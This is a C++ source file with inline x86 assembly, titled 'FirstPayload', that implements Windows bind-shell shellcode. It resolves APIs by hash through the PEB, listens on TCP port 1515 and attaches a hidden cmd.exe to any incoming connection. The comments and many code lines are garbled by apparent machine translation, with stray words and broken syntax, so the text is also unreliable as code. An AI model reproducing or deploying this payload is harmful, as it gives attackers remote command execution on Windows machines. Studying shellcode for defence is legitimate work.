FirstPayload
// FirstPayload.cpp: This file contains the "main" function. Program execution will begin and end here.
// #include "pch.h" #include <the iostream> int main () { the __asm { the SUB the ESP, 0x20 // open period of stack space, increased robustness Push EBP MOV EBP, ESP Sub ESP, 0x10 the JMP tag_Shellcode / / pre-code, to avoid later data is interpreted as instructions // cmd.exe // [tag_Next-0x25] _asm _emit (0x63) _asm _emit (0x6D) _asm _emit (0x64) _asm _emit (0x2E) _asm _emit (0x65) _emit _asm (0x78) _asm _emit (0x65) _asm _emit (0x00) // ws2_32.dll \ 0 // [tag_Next-0x1D] _asm _emit (0x77) _asm _emit (0x73) _asm _emit (0x32) _asm _emit (0x5F)
_emit _asm (0x33) _asm _emit (0x32) _asm _emit (0x2E) _asm _emit (0x64)
_asm _emit (0x6C) _asm _emit (0x6C) _asm _emit (0x00)
// Kernel32.dll
// [tag_Next-0x12]
_asm _emit ( 0x6B) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x6E)
_asm _emit (0x65) _asm _emit (0x6C) _asm _emit (0x33) _asm _emit (0x32)
_asm _emit (0x2E) _asm _emit (0x64) _asm _emit ( 0x6C) _asm _emit (0x6C)
_asm _emit (0x00) tag_Shellcode: //1.GetPC the CALL tag_Next tag_Next: POP // EBX BaseAddr MOV [EBP-0x04], EBX // LOCAL_1 = shellcode BaseAddr // 2. The key acquisition module base address mov esi, dword ptr fs: [ 0x30] // PEB address
mov esi, [esi + 0x0C] // pointer pointing PEB_LDR_DATA
mov esi, [esi + 0x1C] // module list pointer
mov esi, [esi] // second access list entry
mov edx, [esi + 0x08 ] // Get Kernel32.dll base address
@ LoadLibraryExA acquired function address 3.
Push the ImageBase = // EDX Kernel32.dll
Push @ nHashDigest 0xC0D83287 = LoadLibraryExA Digest
Call fun_GetFunAddrByHash // custom function to find a hash function address value
EDI MOV, EAX LoadLibraryExA // // 4. loading Kernel32.dll, enhanced compatibility (Win7 achieved are KernelBase.dll base address) LEA ESI, [EBX-0x12] // Kernel32.dll \ 0 Push 0 / / / -dwFlags = 0
0 // Push | = 0 -hFile
Push ESI @ | = -lpLibFileName Kernel32.dll
Call EDI // LoadLibraryExA ()
MOV [EBP-0x08], EAX = Local2 Kernel32.dll base address @ @ 5. Load ws2_32.dll behind to facilitate network communications programming LEA ESI, [EBX - 0x1D] ws2_32.dll // \ 0 Push // 0 / = 0 -dwFlags Push // 0 | 0 = -hFile Push ESI // | -lpLibFileName ws2_32.dll = Call EDI // LoadLibraryExA () MOV [EBP - 0x0C], EAX = ws2_32.dll group address @ local3 // Payload portion 6. Run
push [ebp-0x0C] // ws2_32.dll base address
push [ebp-0x08] // Kernel32.dll base address
Push [EBP-0x04] // BaseAddr
Call fun_Payload // // 7.Payload finished, the program ends , prevent the debug analysis Push [EBP-0x08] // = IMAGEBASE of PARAM_2 (Kernel32.dll) Push 0x4FD18963 nHashDigest // = the ExitProcess Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash Push // 0 / -uExitCode = NULL Call // EAX the ExitProcess () ESP mov, ebp // POP // ebp
////////////////////////////////////////////////// ////////////////////////
// get the hash function based on the value, the return value is a key function address
/////////// ////////////////////////////////////////////////// /////////////
fun_GetFunAddrByHash: // (nHashDigest int, int the ImageBase) Push EBP MOV EBP, ESP Sub ESP, 0x0C Push EDX // the ENT the EOT 1. Get the EAT MOV EDX, [EBP 0x0C +] // PARAM_1 (the ImageBase) MOV ESI, [EDX + 0x3C] // IMAGE_DOS_HEADER.E_LFANEW LEA ESI, [EDX + ESI] // the PE header mov esi, [esi + 0x78] // iMAGE_DIR ... EXPORT .VirtualAddress LEA ESI, [edx + ESI] // export table first address mov EDI, [ESI + 0x1C] // IMAGE_EXP ... ORY.AddressOfFunctions LEA EDI, [edx + EDI] // EAT first address mov [ebp- 0x04], edi // LOCAL_1 EAT first address
mov edi, [esi + 0x20] // IMAGE_EXP ... ORY.AddressOfNames
LEA EDI, [edx + EDI] // ENT first address
mov [ebp-0x08], edi // LOCAL_2 ENT first address
mov edi, [esi + 0x24] // ... ORY.AddressOfNameOrdinals IMAGE_EXP
LEA EDI, [EDX + EDI] @ the EOT first address
mov [ebp-0x0C], edi // EOT first address
// function names of ENT 2. robin
xor ecx , ECX
JMP tag_FirstCmp
tag_CmpFunNameLoop:
inc is ECX
tag_FirstCmp:
MOV ESI, [EBP-0x08] // LOCAL_2e the ENT
MOV ESI, [ESI + ECX *. 4] // the ENT the RVA
MOV EDX, [EBP + 0x0C] // PARAM_1 IMAGEBASE
LEA ESI , [EDX + ESI] // the ENT VA
Push [EBP + 0x08] // = PARAM_1 parameter passing nDigest (nDigest)
Push ESI // parameter passing the ENT VA = strFunName
Call fun_Hash_CmpString // hash value comparison
Test eax, eax eax // if equal to 1, otherwise 0
// JE tag_CmpFunNameLoop notes, books jne is
found // 3. After successful sequence number corresponding
MOV ESI, [EBP-0x0C] @ the EOT LOCAL_3
XOR EDI, EDI
MOV DI, [ESI + ECX * 2] // function name with an array index to find the corresponding serial number in the array
@ 4 used as an index number, to find the address function corresponding to the function name
mov edx, [ebp-0x04] LOCAL_1 the EAT //
MOV ESI, [EDX + EDI *. 4] // find the sequence number in the address corresponding to the function address of the array function
MOV EDX, [EBP + 0x0C] ImageBase PARAM_1 //
// 5. the return address of the function key acquired
lea eax, [edx + esi] // GetProcAddress return address
POP edx
mov ESP, ebp
POP ebp
RETN 0x08 fun_Hash_CmpString: // (strFunName char *, int nDigest) the Push ebp mov ebp, ESP Sub ESP, 0x04 // open local variables and clears mov dword ptr [ebp-0x04] , 0x00
push ebx // save registers used
Push ECX
Push EDX
MOV ESI, [EBP + 0x08] // PARAM_1 (strFunName)
XOR ECX, ECX
XOR EAX, EAX
tag_HashLoop:
MOV Al, [ESI + ECX] = // Al character the first character string ecx
test al, al // determines whether 0, 0 to the end of the cycle
JZ tag_HashEnd MOV EBX, [EBP-0x04] // LOCAL_1 (Abstract) SHL EBX, 0x19 // summary << 0x19 (25 ) mov edx, [ebp-0x04] // LOCAL_1 (summary) SHR edx, 0x07 0x07 // summary >> (07) or EBX, EBX // edx | edx the Add EBX, eax + edx // character ASCII mov [ebp -0x04], EBX inc is ECX // ECX ++ JMP tag_HashLoop tag_HashEnd: MOV EBX, [EBP + 0x0C] // of PARAM_2 (nDigest)
mov edx, [ebp-0x04] // LOCAL_1 ( Abstract)
XOR EAX, EAX
CMP EBX, EDX
JNE tag_FunEnd // NOTE
MOV EAX,. 1 tag_FunEnd: POP EDX POP ECX POP EBX MOV ESP, EBP POP EBP RETN 0x08 / ////////////////////////////////////////////////// /////////////////////// // payload, the return value is NULL /////////////////// ////////////////////////////////////////////////// ///// fun_Payload: // (int BaseAddr, Kernel32_Base int, int ws2_32_Base) Push EBP MOV EBP, ESP Sub ESP, 0x300 // initialization 1. Winsock service push [ebp + 0x10] // IMAGEBASE = PARAM_3 (ws2_32. dll)
push 0x80B46A3D // nHashDigest =WSAStartup Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
lea esi ,[ebp-0x300] // WSAData
push esi // /-lpWSAData=WSADATA
push 0x0202 // |-wVersionRequested=2.2
call eax // WSAStartup()
test eax,eax
jnz tag_PaloadEnd
// 2.创建一个原始套接字
push [ebp+0x10] // IMAGEBASE =PARAM_3(WS2_32.dll)
push 0xDE78322D // nHashDigest =WSASocketA Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0 // /-dwFlags=0
0 // Push | = 0 -g
Push // 0 | 0 = -lpProtocolInfo
Push. 6 // | = IPPROTO_TCP go --protocol
Push. 1 // | = SOCK_STREAM -type
Push // 2 | = AF_INET -AF
Call // EAX WSASocketA ()
MOV [EBP - 0x04], EAX = SOCKET LOCAL_1 // // 3. bind a port 1515 [0x05BE -> 0XBE05] in an arbitrary address (INADDR_ANY) Push [EBP + 0x10] // = PARAM_3 IMAGEBASE (Ws2_32.dll) PUSH 0xDDA71064 = // nHashDigest the bind Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash
Word PTR MOV [EBP-0x200], 0x02 // /SOCKADDR_IN.sin_family=AF_INET
MOV Word PTR [EBP-0x1FE], // 0xEB05 | SOCKADDR_IN.sin_port = 0xEB05 (1515)
MOV DWORD PTR [EBP-0x1FC], 0 / / \ SOCKADDR_IN.sin_addr = INADDR_ANY
LEA ESI, [ebp-0x200] // SOCKADDR_IN
the Push // 0x14 / 0x14 = -namelen
the Push ESI // | -name = SOCKADDR_IN
the Push [ebp-0x04] // | -s LOCAL_1 (socket )
Call // EAX the bind ()
Test EAX, EAX //
JNZ tag_PaloadEnd
// connections 4. monitor application, the queue can hold up to five links
push [ebp + 0x10] // IMAGEBASE = PARAM_3 (wS2_32.dll)
push 0x4BD39F0C // nHashDigest =listen Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0x7FFFFFFF // /-backlog =SOMAXCONN
push[ebp - 0x04] // |-s LOCAL_1(socket)
call eax // listen()
test eax, eax
jnz tag_PaloadEnd
// 5. 接受一个链接
push[ebp + 0x10] // IMAGEBASE =PARAM_3(WS2_32.dll)
push 0x01971EB1 // nHashDigest =accept Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0 // /-addrlen =0
push 0 // /-addr =0
push[ebp - 0x04] // |-s LOCAL_1(socket)
// EAX Accept Call ()
MOV [EBP-0x04], EAX // LOCAL_1 (SOCKET) = SOCKET // 6. The process creates a CMD, and input and output socket relocated to create in our Push [EBP + 0x0C] // IMAGEBASE = PARAM_3 (Kernel32.dll) Push 0x6BA6BCC9 // nHashDigest = CreateProcessA Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash MOV EDX, EAX // CreateProcessA LEA EDI, [EBP-0x90] // / - empty STARTUPINFOA ECX mov, 0x11 // | -STARTUPINFOA mov eax, 0x00 // | - from [ebp-0x90] start cld // | - to [ebp-0x48] the end of the rep stosd // | -
mov dword ptr [ebp-0x90],0x00000044 // |-STA...A.cb=48
mov dword ptr [ebp-0x64],0x00000100 // |-STA...A.dwFlags=startf...
mov word ptr [ebp-0x60],0x0000 // |-STA...A.wShowWindow=SW_HIDE
mov esi,[ebp-0x04] // |-LOCAL_1(SOCKET)
mov dword ptr[ebp - 0x58], esi // |-STA...A.hStdInput=SOCKET
mov dword ptr[ebp - 0x54], esi // |-STA...A.hStdOutput=SOCKET
mov dword ptr[ebp - 0x50], esi // \-STA...A.hStdError =SOCKET
lea esi,[ebp-0x90] // STARTUPINFOA
lea edi,[ebp-0x200] // PROCESS_INFORMATION
mov ebx,[ebp+0x08] // PARAM_1(BaseAddr)
lea ebx,[ebx-0x25] // cmd.exe\0
push edi // /-lpProcessInformation=PROCESS_INFORMATION
push esi // |-lpStartupInfo =STARTUPINFOA
push 0 // |-lpCurrentDirectory=0
push 0 // |-lpEnvironment=0
push 0 // |-dwCreationFlags=0
push 1 // |-bInheritHandles=1
push 0 // |-lpThreadAttributes=0
push 0 // |-lpProcessAttributs=0
push ebx // |-lpCommandLine=cmd.exe\0
push 0 // |-lpApplicationName=0
call edx // CreateProcessA()
tag_PaloadEnd: //
mov esp,ebp //
pop ebp //
retn 0x0C //
}
}